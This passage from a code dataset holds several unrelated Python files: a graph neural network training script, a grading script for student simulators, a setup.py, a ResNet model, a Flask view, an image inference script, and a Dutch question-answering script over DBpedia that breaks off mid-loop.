/path/to/raw_files\n# --name /name/of/dataset\n# --output /path/to/output_folder\n# -------------------------------------------------------------------\n\n# Setup logger\n#-----------------------\n\nlogger = logging.getLogger('MetaGNN 1.0')\nlogger.setLevel(logging.INFO)\nformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\nconsoleHeader = logging.StreamHandler()\nconsoleHeader.setFormatter(formatter)\nlogger.addHandler(consoleHeader)\n\nstart_time = time.time()\n\nap = argparse.ArgumentParser()\n\nap.add_argument(\"-i\", \"--input\", required=True, help=\"path to the input files\")\nap.add_argument(\"-n\", \"--name\", required=True, help=\"name of the dataset\")\nap.add_argument(\"-o\", \"--output\", required=True, help=\"output directory\")\n\nargs = vars(ap.parse_args())\n\ninput_dir = args[\"input\"]\ndata_name = args[\"name\"]\noutput_dir = args[\"output\"]\n\n# Setup output path for log file\n#---------------------------------------------------\n\nfileHandler = logging.FileHandler(output_dir+\"/\"+\"metagnn.log\")\nfileHandler.setLevel(logging.INFO)\nfileHandler.setFormatter(formatter)\nlogger.addHandler(fileHandler)\n\nlogger.info(\"Welcome to MetaGNN: Metagenomic reads classification using GNN.\")\nlogger.info(\"This version of MetaGNN makes use of the overlap graph produced by Minimap2.\")\n\nlogger.info(\"Input arguments:\")\nlogger.info(\"Input dir: \"+input_dir)\nlogger.info(\"Dataset: \"+data_name)\n\nlogger.info(\"MetaGNN started\")\n\nlogger.info(\"Constructing the overlap graph and node feature vectors\")\n\nbuild_species_map(osp.join(input_dir, data_name, 'raw', overlap_file_name))\ndataset = Metagenomic(root=input_dir, name=data_name)\ndata = dataset[0]\nprint(data)\n\n#exit()\nlogger.info(\"Graph construction done!\")\nelapsed_time = time.time() - start_time\nlogger.info(\"Elapsed time: \"+str(elapsed_time)+\" seconds\")\n\n#cluster_data = ClusterData(data, num_parts=100, recursive=False, save_dir=dataset.processed_dir)\n\n#loader = ClusterLoader(cluster_data, batch_size=128, shuffle=False, num_workers=5)\n\nloader = DataLoader(dataset, batch_size=512, shuffle=True)\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nlogger.info(\"Running GNN on: \"+str(device))\nmodel = Net().to(device)\n\noptimizer = torch.optim.Adam([\n dict(params=model.reg_params, weight_decay=5e-4),\n dict(params=model.non_reg_params, weight_decay=0)\n], lr=0.01)\n\nlogger.info(\"Training model\")\nbest_val_acc = test_acc = 0\nfor epoch in range(1, 50):\n train()\n train_acc, val_acc, tmp_test_acc = test()\n if val_acc > best_val_acc:\n best_val_acc = val_acc\n test_acc = tmp_test_acc\n log = 'Epoch: {:03d}, Train: {:.4f}, Val: {:.4f}, Test: {:.4f}'\n logger.info(log.format(epoch, train_acc, best_val_acc, test_acc))\nelapsed_time = time.time() - start_time\n# Print elapsed time for the process\nlogger.info(\"Elapsed time: \"+str(elapsed_time)+\" seconds\")\n\n#Print GCN model output\noutput(output_dir, input_dir, data_name)\n\n","sub_path":"src/meta_gnn_overlap.py","file_name":"meta_gnn_overlap.py","file_ext":"py","file_size_in_byte":15863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"329397540","text":"import os\nimport commands\nPATH_VALID =\"/home/master/gcking/test/archiTA/Student_valid_testcase\"\nPATH_STUDENT =\"/home/master/gcking/test/archiTA/Student_project1\"\nPATH_TA\t\t =\"/home/master/gcking/test/archiTA/TA_project1\"\n\nFILE = open('valid_check.csv','w')\n\nfor line in open('folder_check.csv','r'):\n\tline = line.split(',')\n\tif(cmp(line[1],\"OK\\n\") == 0):\n\t\t#execute student's\n\t\tos.chdir(PATH_STUDENT+'/'+line[0]+'/simulator')\n\t\tos.system('make clean')\t\t\n\t\tos.system('make')\t\t\n\t\tos.system('cp ../testcase/iimage.bin .')\n\t\tos.system('cp ../testcase/dimage.bin .')\n\t\tos.system('./single_cycle')\n\t\t#execute TA's\n\t\tos.chdir(PATH_TA)\n\t\tos.system('cp '+PATH_STUDENT+'/'+line[0]+'/testcase/iimage.bin .')\n\t\tos.system('cp '+PATH_STUDENT+'/'+line[0]+'/testcase/dimage.bin .')\n\t\terr_msg = commands.getoutput('./single_cycle')\n\t\tspt_diff = commands.getoutput('diff '+PATH_STUDENT+'/'+line[0]+'/simulator/snapshot.rpt snapshot.rpt')\n\t\terr_diff = commands.getoutput('diff '+PATH_STUDENT+'/'+line[0]+'/simulator/error_dump.rpt error_dump.rpt')\n\t\t#valid?\n\t\tif(cmp(err_msg,\"\")==0 and cmp(spt_diff,\"\")==0 and cmp(err_diff,\"\")==0):\n\t\t\tFILE.write(line[0]+','+'1\\n')\n\t\t\tos.chdir(PATH_VALID)\n\t\t\tos.system('mkdir '+line[0])\n\t\t\tos.system('cp '+PATH_TA+'/iimage.bin '+line[0])\n\t\t\tos.system('cp '+PATH_TA+'/dimage.bin '+line[0])\n\t\t\tos.system('cp '+PATH_TA+'/snapshot.rpt '+line[0])\n\t\t\tos.system('cp '+PATH_TA+'/error_dump.rpt '+line[0])\n\t\telse:\n\t\t\tFILE.write(line[0]+','+'0\\n')\n\telse:\n\t\tFILE.write(line[0]+','+'0\\n')\n\t\t\n","sub_path":"archiTA_dev/2_2nd_check_testcase.py","file_name":"2_2nd_check_testcase.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"523284614","text":"from setuptools import setup, find_packages\n\ninstall_requires = [\n \"surprise\",\n \"numpy\",\n \"pandas\",\n \"scikit-learn\",\n \"tqdm\",\n \"user_agent\",\n \"bs4\",\n \"requests\",\n \"lxml\",\n \"streamlit\",\n \"unidecode\",\n]\n\ndev_requires = [\n \"autopep8\",\n \"pytest\",\n \"pytest-cov\",\n \"mock\",\n \"pytest-mock\",\n \"pytest-timeout\",\n \"twine\",\n \"coverage-badge\",\n \"semver\",\n \"flake8\",\n \"pylint\",\n \"moto\"\n]\nsetup(\n name='rssenscritique',\n version=\"1.0.0\",\n description='recommend you movies',\n author='Louis Giron',\n license='',\n packages=find_packages(exclude=[\"tests\"]),\n install_requires=install_requires,\n include_package_data=True,\n extras_require={\"dev\": dev_requires}\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"190802519","text":"'''\nResNet-based model to map an image from pixel space to a features space.\nNeed to be pretrained on the dataset.\n\ncodes are based on\n@article{\nzhang2018mixup,\ntitle={mixup: Beyond Empirical Risk Minimization},\nauthor={Hongyi Zhang, Moustapha Cisse, Yann N. Dauphin, David Lopez-Paz},\njournal={International Conference on Learning Representations},\nyear={2018},\nurl={https://openreview.net/forum?id=r1Ddp1-Rb},\n}\n'''\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom torch.autograd import Variable\n\nIMG_SIZE=128\nNC=3\nresize=(128,128)\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, in_planes, planes, stride=1):\n super(BasicBlock, self).__init__()\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion*planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion*planes)\n )\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.bn2(self.conv2(out))\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, in_planes, planes, stride=1):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(self.expansion*planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion*planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion*planes)\n )\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = F.relu(self.bn2(self.conv2(out)))\n out = self.bn3(self.conv3(out))\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\n\nclass ResNet_extract(nn.Module):\n def __init__(self, block, num_blocks, num_classes=100, nc=NC, img_height=IMG_SIZE, img_width=IMG_SIZE):\n super(ResNet_extract, self).__init__()\n self.in_planes = 64\n\n self.main = nn.Sequential(\n nn.Conv2d(nc, 64, kernel_size=3, stride=1, padding=1, bias=False), # h=h\n nn.BatchNorm2d(64),\n nn.ReLU(),\n self._make_layer(block, 64, num_blocks[0], stride=1), # h=h\n nn.MaxPool2d(kernel_size=2, stride=2), #64\n self._make_layer(block, 128, num_blocks[1], stride=2), #32\n nn.MaxPool2d(kernel_size=2, stride=2), #16\n self._make_layer(block, 256, num_blocks[2], stride=2), #8\n self._make_layer(block, 512, num_blocks[3], stride=2), #4\n nn.AvgPool2d(kernel_size=4)\n )\n self.classifier_1 = nn.Sequential(\n nn.Linear(512*block.expansion, img_height*img_width*nc),\n )\n self.classifier_2 = nn.Sequential(\n nn.BatchNorm1d(img_height*img_width*nc),\n nn.ReLU(),\n nn.Dropout(0.5),\n\n nn.Linear(img_height*img_width*nc, 1024),\n nn.BatchNorm1d(1024),\n nn.ReLU(),\n nn.Dropout(0.5),\n\n nn.Linear(1024, 256),\n nn.BatchNorm1d(256),\n nn.ReLU(),\n nn.Dropout(0.5),\n\n nn.Linear(256, num_classes),\n )\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1]*(num_blocks-1)\n layers = []\n for stride in strides:\n layers.append(block(self.in_planes, planes, stride))\n self.in_planes = planes * block.expansion\n return nn.Sequential(*layers)\n\n def forward(self, x):\n # x = nn.functional.interpolate(x,size=resize,mode='bilinear',align_corners=True)\n features = self.main(x)\n features = features.view(features.size(0), -1)\n features = self.classifier_1(features)\n out = self.classifier_2(features)\n return out, features\n\n\ndef ResNet18_extract(num_classes=100):\n return ResNet_extract(BasicBlock, [2,2,2,2], num_classes=num_classes)\n\ndef ResNet34_extract(num_classes=100):\n return ResNet_extract(BasicBlock, [3,4,6,3], num_classes=num_classes)\n\ndef ResNet50_extract(num_classes=100):\n return ResNet_extract(Bottleneck, [3,4,6,3], num_classes=num_classes)\n\ndef ResNet101_extract(num_classes=100):\n return ResNet_extract(Bottleneck, [3,4,23,3], num_classes=num_classes)\n\ndef ResNet152_extract(num_classes=100):\n return ResNet_extract(Bottleneck, [3,8,36,3], num_classes=num_classes)\n\n\nif __name__ == \"__main__\":\n net = ResNet34_extract(num_classes=100).cuda()\n x = torch.randn(16,3,128,128).cuda()\n out, features = net(x)\n print(out.size())\n print(features.size())\n\n def get_parameter_number(net):\n total_num = sum(p.numel() for p in net.parameters())\n trainable_num = sum(p.numel() for p in net.parameters() if p.requires_grad)\n return {'Total': total_num, 'Trainable': trainable_num}\n\n print(get_parameter_number(net))\n","sub_path":"ImageNet-100/DRE-F-SP+RS/models/ResNet_extract.py","file_name":"ResNet_extract.py","file_ext":"py","file_size_in_byte":5781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"374933277","text":"message =\"\"\"\\\nNews of medical examination\n{}\nWe will carry out a medical examination as follows.\nDate: {} {} ~\nPlace: Kida Clinic\nImplementation items: height, weight, vision measurement, auscultation, blood test \"\"\"\n\ndata = [\n ('Tanaka', '5/21', '13:00'),\n ('Yoshida', '5/21', '14:00'),\n ('Yamanobe', '5/21', '15:00'),\n ]\n\ndef main():\n for d in data:\n print('---------------')\n print(message.format(d[0], d[1], d[2]))\n\nif __name__ == '__main__':\n main()","sub_path":"string/format_loop_taple.py","file_name":"format_loop_taple.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"19050224","text":"from flask import Blueprint, render_template, request\nfrom flask_cors import cross_origin\nfrom datetime import datetime\n\nfrom currenciesapp.models import Report, Currency\n\nmain = Blueprint('main', __name__)\n\n\n@main.route(\"/\")\n@main.route(\"/home\")\n@cross_origin()\ndef home():\n type = request.args.get('type', 'fiat', type=str)\n start_date = Report.query.join(Currency).filter(Currency.type == type).order_by(Report.date.asc()).first().date.date()\n end_date = Report.query.join(Currency).filter(Currency.type == type).order_by(Report.date.desc()).first().date.date()\n date = request.args.get('date', end_date.strftime('%Y-%m-%d'), type=str)\n reports = Report.query.join(Currency).filter(Currency.type == type).filter(Report.date == date).all()\n return render_template('home.html', reports=reports, type=type, selected_date=date)\n","sub_path":"currenciesapp/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"139062159","text":"import tensorflow as tf\r\nimport numpy as np\r\n\r\nimport os\r\nimport h5py\r\nfrom PIL import Image\r\nfrom ops import *\r\nimport scipy.io as sio\r\n\r\n\r\ndef modcrop(im, modulo):\r\n\tif len(im.shape) == 3:\r\n\t\tsize = np.array(im.shape)\r\n\t\tsize = size - (size % modulo)\r\n\t\tim = im[0 : size[0], 0 : size[1], :]\r\n\telif len(im.shape) == 2:\r\n\t\tsize = np.array(im.shape)\r\n\t\tsize = size - (size % modulo)\r\n\t\tim = im[0 : size[0], 0 : size[1]]\r\n\telse:\r\n\t\traise AttributeError\r\n\treturn im\r\n\r\n\r\ndef shave(im, border):\r\n\tif len(im.shape) == 3:\r\n\t\treturn im[border[0] : -border[0], \r\n\t\t border[1] : -border[1], :]\r\n\telif len(im.shape) == 2:\r\n\t\treturn im[border[0] : -border[0], \r\n\t\t border[1] : -border[1]]\r\n\telse:\r\n\t\traise AttributeError\r\n\r\n\r\nclass Net(object):\r\n\tdef __init__(self, lr, non_local, wl, tower, reuse):\r\n\t\t# training inputset\r\n\t\tself.lr = lr\r\n\t\t\r\n\t\t# multi-gpu related settings\r\n\t\tself.reuse = reuse\r\n\t\tself.tower = tower\r\n\t\t\r\n\t\t# parameter lists for weights and biases\r\n\t\tself.W_params = []\r\n\t\tself.b_params = []\r\n\t\t\r\n\t\t# coefficient of weight decay\r\n\t\tself.wl = wl\r\n\t\t\r\n\t\t# whether to enable the non-local block\r\n\t\tself.non_local = non_local\r\n\t\r\n\t\r\n\tdef dfus_block(self, bottom, i):\r\n\t\tact = tf.nn.relu\r\n\r\n\t\twith tf.variable_scope('dfus_block' + str(i), reuse=self.reuse):\r\n\t\t\tconv1 = act(conv2d(bottom, 64, [1, 1], wl=None, reuse=self.reuse, tower_index=self.tower, scope='conv' + str(i) + '_i'), name='relu' + str(i) + '_i')\r\n\r\n\t\t\tfeat1 = act(conv2d(conv1, 16, [3, 3], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv' + str(i) + '_1'), name='relu' + str(i) + '_1')\r\n\t\t\tfeat15 = act(conv2d(feat1, 8, [1, 1], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv' + str(i) + '_15'), name='relu' + str(i) + '_15')\r\n\r\n\t\t\tfeat2 = act(conv2d(conv1, 16, [3, 3], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv' + str(i) + '_2'), name='relu' + str(i) + '_2')\r\n\t\t\tfeat23 = act(conv2d(feat2, 8, [1, 1], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv' + str(i) + '_23'), name='relu' + str(i) + '_23')\r\n\r\n\t\t\tfeat = tf.concat([feat1, feat15, feat2, feat23], 3, name='conv' + str(i) + '_c1')\r\n\t\t\tfeat = act(conv2d(feat, 16, [1, 1], wl=None, reuse=self.reuse, tower_index=self.tower, scope='conv' + str(i) + '_r'), name='relu' + str(i) + '_r')\r\n\r\n\t\t\ttop = tf.concat([bottom, feat], 3, name='conv' + str(i) + '_c2')\r\n\r\n\t\treturn top\r\n\r\n\r\n\tdef ddfn(self, bottom, step, b=10):\r\n\t\tact = tf.nn.relu\r\n\r\n\t\twith tf.variable_scope('ddfn_' + str(step), reuse=self.reuse):\r\n\t\t\twith tf.name_scope('msfeat'):\r\n\t\t\t\tconv13 = act(conv2d(bottom, 16, [3, 3], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv1_3'), name='relu1_3')\r\n\t\t\t\tconv15 = act(conv2d(bottom, 16, [3, 3], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv1_5'), name='relu1_5')\r\n\r\n\t\t\t\tconv135 = act(conv2d(conv13, 16, [1, 1], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv1_3_5'), name='relu1_3_5')\r\n\t\t\t\tconv153 = act(conv2d(conv15, 16, [1, 1], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv1_5_3'), name='relu1_5_3')\r\n\r\n\t\t\t\tconv1 = tf.concat([conv13, conv15, conv135, conv153], 3, name='conv1_c')\r\n\r\n\t\t\tif self.non_local:\r\n\t\t\t\tconv1, _ = non_local_block(conv1, reuse=self.reuse, tower_index=self.tower)\r\n\r\n\t\t\tfeat = self.dfus_block(conv1, 2)\r\n\r\n\t\t\tfor i in range(3, b, 1):\r\n\t\t\t\tfeat = self.dfus_block(feat, i)\r\n\r\n\t\t\ttop = feat\r\n\r\n\t\t\treturn top\r\n\t\r\n\t\r\n\tdef build_net(self):\r\n\t\twith tf.variable_scope('net', reuse=self.reuse):\r\n\t\t\tfeat0 = self.ddfn(self.lr, 0, b=60)\r\n\t\t\tfeat1 = self.ddfn(self.lr, 1, b=60)\r\n\t\t\tfeat2 = self.ddfn(self.lr, 2, b=60)\r\n\t\t\tfeat = tf.concat([feat0, feat1, feat2], axis=3)\r\n\t\t\t\r\n\t\t\toutputs = conv2d(feat, 31, [1, 1], W_init=tf.truncated_normal_initializer(mean=0.0, stddev=0.001),\r\n\t\t\t add_biases=True, wl=None, reuse=self.reuse, tower_index=self.tower, scope='fusion')\r\n\t\t\tself.sr = outputs\r\n\r\n\r\ndef main():\r\n\t# folder path\r\n\tlr_folder = './NTIRE2018_Test_RealWorld'\r\n\toutput_folder = './test_results_1'\r\n\ttest_ims = ['Fri_1215-1110', 'Fri_1215-1125', 'Fri_1215-1306', 'Sat_1223-1134', 'Sat_1223-1337']\r\n\t\r\n\twith tf.device('/cpu:0'):\r\n\t\tlr = tf.placeholder('float', [1, None, None, 3])\r\n\t\r\n\t# recreate the network\r\n\tnet = Net(lr, False, None, 0, reuse=False)\r\n\twith tf.device('/cpu:0'):\r\n\t\tnet.build_net()\r\n\toutput = net.sr\r\n\t\r\n\t# create a session for running operations in the graph\r\n\tconfig = tf.ConfigProto(allow_soft_placement=True)\r\n\tconfig.gpu_options.allow_growth = True\r\n\tsess = tf.Session(config=config)\r\n\t\r\n\t# restore weights\r\n\tsaver = tf.train.Saver()\r\n\t\r\n\t# set a range for searching\r\n\tstart_iter = 124000\r\n\tstep_iter = 1000\r\n\tend_iter = 124000\r\n\t\r\n\t# search for the best model\r\n\trecord_psnr = []\r\n\tfor itera in np.arange(start_iter, end_iter + step_iter, step_iter):\r\n\t\tsaver.restore(sess, os.path.join('./models', 'model.ckpt-' + str(itera)))\r\n\t\tfor name in test_ims:\r\n\t\t\tim_name = name + '_camera.jpg'\r\n\t\t\tim_lr = np.array(Image.open(os.path.join(lr_folder, im_name)))\r\n\t\t\tim_lr = im_lr.astype(np.float32) / 255.0\r\n\t\t\tim_lr = np.expand_dims(im_lr, axis=0)\r\n\r\n\t\t\tim_sr = sess.run(output, feed_dict={lr: im_lr})\r\n\t\t\tim_sr = np.squeeze(im_sr) * 4095.0\r\n\t\t\t\r\n\t\t\tmat_name = name + '.mat'\r\n\t\t\tsio.savemat(os.path.join(output_folder, mat_name), {'rad': np.transpose(im_sr, [0, 1, 2])})\r\n\t\t\tprint(name)\r\n\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n","sub_path":"hscnn-d_real/inference/inference1.py","file_name":"inference1.py","file_ext":"py","file_size_in_byte":5379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"307717121","text":"from SPARQLWrapper import SPARQLWrapper, JSON\nfrom subprocess import Popen, call, DEVNULL, STDOUT, check_output\nimport sys, os, re\n\n#Files which can be used\nFILE_PAIRCOUNT = \"pairCounts\"\nFILE_SIMILARWORDS = \"similarwords\"\n\n#Bundles the sentence, domain and property in one class\nclass Question:\n\tsentence = None\n\tdomain = None\n\tproperty = None\n\n#Links a SPARQL property to a list of property names\nclass PropertyLink:\n\tSPARQLProperty = None\n\tproperties = None\n\tdef __init__(self, SPARQLPropertyIn, propertiesIn):\n\t\tself.SPARQLProperty = SPARQLPropertyIn\n\t\tself.properties = propertiesIn\n\n#Shows given examples\ndef showExamples(examples):\n\tprint(\"Example sentences:\")\n\tfor example in examples:\n\t\tprint(example)\n\n#Shows help\ndef showHelp():\n\tprint(\"You can type a sentence which has the following order:\\nWie/Wat is/was/zijn/waren PROPERTY van/op/bij DOMAIN?\")\n\t#print(\"NOTE: if the word \\\"van\\\" is NOT used, the sentence WILL NOT parse!\")\n\tprint(\"You can try your own property or use one of the properties listed below:\")\n\tfor propLink in propertyLinks:\n\t\tfor prop in propLink.properties:\n\t\t\tprint(prop)\n\tprint(\"To exit the program type exit\")\n\tinput(\"PRESS THE ENTER KEY TO CONTINUE...\")\n\n#Searches given query and gives results\ndef searchQuery(select):\n\treturnList = []\n\tsp.setReturnFormat(JSON)\n\tresults = sp.query().convert()\n\tif len(results[\"results\"][\"bindings\"]) == 0:\n\t\treturn None\n\tfor result in results[\"results\"][\"bindings\"]:\n\t\treturnList.append(result[select][\"value\"])\n\treturn returnList\n\n#Makes a query based on a property and URI\ndef makeQuery(property, URI):\n\treturn \"SELECT str(COALESCE(?solution2, ?solution)) as ?solution \\n \\\n\tWHERE{\\n \\\n\t<\"+ URI +\"> \"+ property +\" ?solution .\\n \\\n\tOPTIONAL{?solution rdfs:label ?solution2} \\\n\t}\"\n\ndef performQuestion(property, URI):\n\tquery = makeQuery(property, URI)\n\tsp.setQuery(query)\n\tresults = searchQuery(\"solution\")\n\tif results is None or len(results) == 0:\n\t\treturn False\n\telse:\n\t\tprint(\"Result\")\n\t\tfor result in results:\n\t\t\tprint(result)\n\treturn True\n\n#Removes articles from the input\ndef removeArticles(input):\n\tfor word in articles:\n\t\tif word in input:\n\t\t\tinput = input.replace(word+\" \", \"\")\n\treturn input\n\n#Finds a substring between first and last\ndef find_between( input, first, last ):\n try:\n start = input.index( first ) + len( first )\n end = input.index( last, start )\n return input[start:end]\n except ValueError:\n return \"\"\n\n#Clears the given q\ndef clearQ(q):\n\tq.sentence = None\n\tq.property = None\n\tq.domain = None\n\treturn q\n\n#Checks the variables in Q, False if it is ok, True is is not\ndef checkQ(q):\n\tif q.property == None:\n\t\tprint(\"ERROR: Incorrect or no property given!\\n Type \\\"help\\\" to see how the program should be used!\", file=sys.stderr)\n\t\treturn True\n\tif q.domain == None:\n\t\tprint(\"ERROR: No domain given!\\nType \\\"help\\\" to see how the program should be used!\", file=sys.stderr)\n\t\treturn True\n\treturn False\n\n#Returns the string with the highers frequency\ndef getHighestPairCount(PCList):\n\treturnItem = None\n\tfreq = None\n\tfor item in PCList:\n\t\tcurrentFreq = find_between(find_between(item, \"\\t\", \"\\n\") + \"\\n\", \"\\t\", \"\\n\")\n\t\tif freq is None or freq < int(currentFreq):\n\t\t\tfreq = int(currentFreq)\n\t\t\treturnItem = item\n\treturn returnItem\n\n#Searches the given file on the given query\ndef search(query, file):\n\toutList = []\n\tif file == FILE_SIMILARWORDS and \"#\" not in query:\n\t\tquery += \"#\"\n\tfor line in open(file, \"r\"):\n\t\tif re.search(\"^\"+query, line , re.IGNORECASE):\n\t\t\toutList.append(line)\n\treturn outList\n\n#gives the URI of a given domain\ndef getDomainURI(domain):\n\tPCList = search(domain, FILE_PAIRCOUNT)\n\tif len(PCList) is 0:\n\t\treturn None\n\tbestItem = getHighestPairCount(PCList)\n\treturn find_between(bestItem, \"\\t\", \"\\t\")\n\ndef makeAZ(string):\n\treturn re.sub(r'[\\W_]+', '', string)\n\ndef getSimilarWords(string):\n\treturnList = []\n\tsearchList = search(string, FILE_SIMILARWORDS)\n\tfor item in searchList:\n\t\treturnList += item.split(\"#\")\n\tif not returnList:\n\t\treturnList.append(string)\n\treturn returnList\n\t\t\ndef findPropertySimilarWords(sentence):\n\tbestProp = None\n\tfor verb in verbs:\n\t\tfor preprosition in prepositions:\n\t\t\tif verb in sentence and preprosition in sentence:\n\t\t\t\tcurrentProp = str(find_between(sentence.lower(), verb+\" \", \" \"+preprosition))\n\t\t\t\tif currentProp is not None and currentProp != \"\" and currentProp != \" \" and ( bestProp is None or len(bestProp) < len(currentProp)):\n\t\t\t\t\tbestProp = currentProp\n\tif bestProp is None:\n\t\treturn None\n\treturn getSimilarWords(removeArticles(bestProp))\n\n# search in files using grep NOT USED\ndef grep(query, file):\n\t#currentDir = os.path.dirname(os.path.realpath(__file__))\n\t#Popen(currentDir, stdout=DEVNULL, stderr=STDOUT, shell=True)\n\t#grep -i '^QUERY(#)' file\n\tsyscall = \"grep -i \\'^\"+query\n\tif file == \"similarwords\":\n\t\tsyscall += \"#\"\n\tsyscall += \"\\' \" + file\n\t#out = call(str(syscall), stdout=DEVNULL, stderr=STDOUT, shell=True)\n\tout = os.system(syscall)\n\t#print(check_output())\n\treturn out\n\n#Parses the question, adds property and domain to q\ndef parseQuestion(q):\n\tinput = q.sentence.lower()\n\tfor propLink in propertyLinks:\n\t\tfor prop in propLink.properties:\n\t\t\tif prop in input:\n\t\t\t\tq.property = propLink.SPARQLProperty\n\t\t\t\tbreak\n\t\tif q.property is not None and q.property is not \"\":\n\t\t\tbreak\n\tfor word in prepositions:\n\t\ttempDomain = find_between(input,word+\" \",\"?\")\n\t\tif tempDomain != \"\" and (q.domain is None or len(q.domain) < len(tempDomain)):\n\t\t\tq.domain = tempDomain\n\treturn q\n\ndef checkDomain(q):\n\tif q.domain is None:\n\t\tprint(\"ERROR: No domain given!\\nType \\\"help\\\" to see how the program should be used!\", file=sys.stderr)\n\t\treturn True\n\treturn False\n\ndef checkProperty(q):\n\tif q.property == None:\n\t\treturn True\n\treturn False\n\t \n#All propertylinks\npropertyLinks = [\nPropertyLink(\"prop-nl:opener\", [\"opener\", \"openaar\"]),\nPropertyLink(\"prop-nl:opening\", [\"begin datum\", \"opening\"]),\nPropertyLink(\"prop-nl:sluiting\", [\"eind datum\", \"sluiting\"]),\nPropertyLink(\"prop-nl:plaats\", [\"locatie\", \"plaats\"]),\nPropertyLink(\"prop-nl:atleten\", [\"aantal atleten\", \"hoeveelheid deelnemers\"]),\nPropertyLink(\"prop-nl:lengte\", [\"lengte\", \"grootte\"]),\nPropertyLink(\"prop-nl:bijnaam\", [\"bijnaam\", \"alias\"]),\nPropertyLink(\"prop-nl:geboortedatum\", [\"geboortedatum\", \"geboortedag\"]),\nPropertyLink(\"prop-nl:discipline\", [\"discipline\", \"sport\"]),\nPropertyLink(\"prop-nl:trainer\", [\"trainer\", \"coach\"])\n]\n\n#The grammar which is used\nintPronoun = [\"wie\", \"wat\"]\narticles = [\"de\", \"het\"]\nverbs = [\"is\", \"zijn\", \"was\", \"waren\"]\nprepositions = [\"van\", \"op\", \"bij\"]\ngrammar = intPronoun + articles + verbs + prepositions\n\n#Examples\nexamples = [\n\"Wie is de opener van de Olympische Zomerspelen 1936?\",\n\"Wat is de lengte van Fatima Moreira de Melo?\",\n\"Wat was de start datum van de Olympische Winterspelen 2014?\",\n\"Wat was de eind datum van de Olympische Winterspelen 2010?\",\n\"Wat was de locatie van de Olympische Zomerspelen 2000?\",\n\"Wat is het aantal atleten van de Olympische Zomerspelen 1996?\",\n\"Wat is de bijnaam van Yuri van Gelder?\",\n\"Wat is de geboortedatum van Sven Kramer?\",\n\"Wat is de discipline van Epke Zonderland?\",\n\"Wie is de coach van Naomi van As?\"\n]\n\nprint(\"To exit the program, type \\\"exit\\\". For help type \\\"help\\\"\", file=sys.stderr)\nshowExamples(examples)\n\nq = Question()\nsp = SPARQLWrapper(\"http://nl.dbpedia.org/sparql\")\n\n#while True:\nfor line in sys.stdin:\n\tq = clearQ(q)\n\tq.sentence = line.rstrip()\n\t#q = clearQ(q)\n\t#q.sentence = input(\"TYPE A QUESTION OR COMMAND...\\n\")\n\n\tif q.sentence == \"exit\":\n\t\tbreak\n\tif q.sentence == \"help\":\n\t\tshowHelp()\n\t\tcontinue\n\n\tif \"?\" not in q.sentence:\n\t\tq.sentence += \"?\"\n\n\tq = parseQuestion(q)\n\n\tif checkDomain(q):\n\t\tcontinue\t\t\n\n\tURI = getDomainURI(q.domain)\n\n\tif URI is None:\n\t\tURI = getDomainURI(removeArticles(q.domain))\n\t\tif URI is None:\n\t\t\tprint(\"Error: No corresponding domain found to \"+ q.domain, file=sys.stderr)\n\t\t\tcontinue\n\n\tif checkProperty(q):\n\t\tSWList = findPropertySimilarWords(q.sentence)\n\t\tif SWList is None:\n\t\t\tprint(\"ERROR: Could not find property\", file=sys.stderr)\n\t\t\tcontinue\n\t\tfor item in 